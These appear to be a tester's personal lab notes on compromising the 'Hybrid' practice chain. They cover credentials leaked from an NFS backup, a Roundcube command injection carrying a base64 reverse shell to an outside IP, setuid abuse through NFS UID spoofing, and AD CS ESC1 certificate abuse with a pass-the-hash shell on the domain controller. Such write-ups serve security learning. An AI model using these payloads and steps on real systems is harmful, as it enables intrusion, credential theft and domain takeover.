Hybrid (Chain)
This is not a writeup, just my notes about the machine.
Machine information
Operating System: Windows
Chain: True (2 Machines)
Credentials
Username
Password
Method
Scope
admin@hybrid.vl
Duckling21
Backup File
Roundcube Webmail
peter.turner@hybrid.vl
PeterIstToll!
Backup File
Roundcube Webmail
✅ Valid Usernames
peter.turner@hybrid.vl🔑 Passwords list
Duckling21
PeterIstToll!Information Gathering
Nmap
nmap -p- -A --open -T5 -Pn -n -oN ext_hybrid_tcp_allports -vvv --min-rate 3000 10.10.141.149-150
#10.10.141.149
53/tcp open tcpwrapped syn-ack
135/tcp open tcpwrapped syn-ack
139/tcp open tcpwrapped syn-ack
445/tcp open tcpwrapped syn-ack
3389/tcp open tcpwrapped syn-ack
9389/tcp open tcpwrapped syn-ack
49667/tcp open tcpwrapped syn-ack
49670/tcp open tcpwrapped syn-ack
#10.10.141.150
22/tcp open tcpwrapped syn-ack
25/tcp open tcpwrapped syn-ack
80/tcp open tcpwrapped syn-ack
110/tcp open tcpwrapped syn-ack
111/tcp open tcpwrapped syn-ack
143/tcp open tcpwrapped syn-ack
993/tcp open tcpwrapped syn-ack
995/tcp open tcpwrapped syn-ack
2049/tcp open nfs
35407/tcp open tcpwrapped syn-ackInitial Enumeration
Enumerating the network file system
showmount -e 10.10.141.150
Export list for 10.10.141.150:
/opt/share *Mounting the network file system
mkdir share
sudo mount -t nfs 10.10.141.150:/opt/share share -o nolock
cp share/backup.tar.gz .
tar -xvf backup.tar.gzDiscovering leaked credentials into a files.
tree
.
├── backup.tar.gz
├── etc
│ ├── dovecot
│ │ └── dovecot-users
│ ├── passwd
│ ├── postfix
│ │ └── main.cf
│ └── sssd
│ └── sssd.conf
└── opt
└── certs
└── hybrid.vl
├── fullchain.pem
└── privkey.pemFile: etc/dovecot/dovecot-users
-------------------------------
admin@hybrid.vl:{plain}Duckling21
peter.turner@hybrid.vl:{plain}PeterIstToll!RoudCube enumeration
Discovering a vulnerable pluging
Exploitation
Modifying the user's email field to abuse the RCE.
peter.turner&echo${IFS}L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUuNDgvMTIzNCAwPiYx${IFS}|${IFS}base64${IFS}-d${IFS}|bash&@hybrid.vl
Lateral Movement to peter.turner
Abusing UID Spoofing and NFS Share
Attack Path:
To escalate privileges, the tester leveraged an NFS share misconfiguration that allowed file manipulation using the www-data account. The exploitation flow was as follows:
UID Spoofing: On the tester's machine, a local user was created with the same UID as the target user
peter.turner@hybrid.vl(UID:902601108) to impersonate them over the NFS share:sudo useradd -u 902601108 peter.turner@hybrid.vl --badname -p 'password123'Abusing NFS Share with
www-data: The compromisedwww-dataaccount had write access to a shared NFS directory. A custom Bash binary was placed into the NFS share from this account.Setting the SetUID Bit (on Attacker's Machine): From the attacker-controlled machine (where the spoofed user existed), the tester moved the Bash binary to a temporary directory (e.g.,
/tmp), modified its permissions to include the setuid bit, and moved it back into the NFS directory:chmod u+s bash mv bash /path/to/nfs/share/Privilege Escalation: Back on the target machine, the
www-dataaccount executed the Bash binary with elevated privileges using the-pflag:./bash -pThis resulted in a shell running with the effective UID of
peter.turner@hybrid.vl, allowing privilege escalation.
Privilege Escalation to root on mail01
Finding a Keepass database
Inside the peter.turner@hybrid.vl 's directory there was a keepass database file. I moved to my machine and extracted the credentials due reusing credentials.
❯ kpcli --kdb=passwords.kdbx
Provide the master password: *************************
kpcli:/> cd hybrid.vl
kpcli:/hybrid.vl> ls
=== Entries ===
0. domain
1. mail mail01.hybrid.vl
kpcli:/hybrid.vl> show 0
Title: domain
Uname: peter.turner
Pass: b0cwR+G4Dzl_rw
URL:
Notes: Abusing the sudoers configuration
peter.turner@hybrid.vl@mail01:~$ sudo -l
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User peter.turner@hybrid.vl may run the following commands on mail01:
(ALL) ALL
peter.turner@hybrid.vl@mail01:~$ sudo su
root@mail01:/home/peter.turner@hybrid.vl#Compromising Domain controller
Discovering Domain Computers is vulnerable to ESC1
❯ certipy-ad find -u peter.turner -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.219.181 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : hybrid-DC01-CA
DNS Name : dc01.hybrid.vl
Certificate Subject : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
Certificate Serial Number : 7D22C8F2760BC48A4E57B5E94984304B
Certificate Validity Start : 2023-06-17 14:04:39+00:00
Certificate Validity End : 2125-04-03 23:35:28+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : HYBRID.VL\Administrators
Access Rights
ManageCertificates : HYBRID.VL\Administrators
HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
ManageCa : HYBRID.VL\Administrators
HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
Enroll : HYBRID.VL\Authenticated Users
Certificate Templates
0
Template Name : HybridComputers
Display Name : HybridComputers
Certificate Authorities : hybrid-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : HYBRID.VL\Domain Admins
HYBRID.VL\Domain Computers
HYBRID.VL\Enterprise Admins
Object Control Permissions
Owner : HYBRID.VL\Administrator
Write Owner Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Dacl Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Property Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
[!] Vulnerabilities
ESC1 : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authenticationExtracting the Compromised Computer NT Hash to abuse the ESC1
python3 keytabextract.py /home/Intrusionz3r0/Documents/Hybrid/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HYBRID.VL
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
AES-128 HASH : 3a732454c95bcef529167b6bea476458Abusing the ESC1 to compromise domain controler.
❯ certipy-ad req -u 'MAIL01$' -hashes :0f916c5246fdbc7ba95dcef4126d57bd -dc-ip 10.10.219.181 -ca hybrid-DC01-CA -template HybridComputers -upn Administrator -key-size 4096 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'Requesting administrator's Ticket Granting ticket TGT
❯ certipy-ad auth -username Administrator -dc-ip 10.10.219.181 -pfx administrator.pfx -domain hybrid.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:60701e8543c9f6db1a2af3217386d3dcObtaining a shell as Administrator on DC01
❯ impacket-wmiexec hybrid.vl/Administrator@10.10.219.181 -hashes :60701e8543c9f6db1a2af3217386d3dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
hybrid\administrator
C:\>hostname
dc01
C:\>Last updated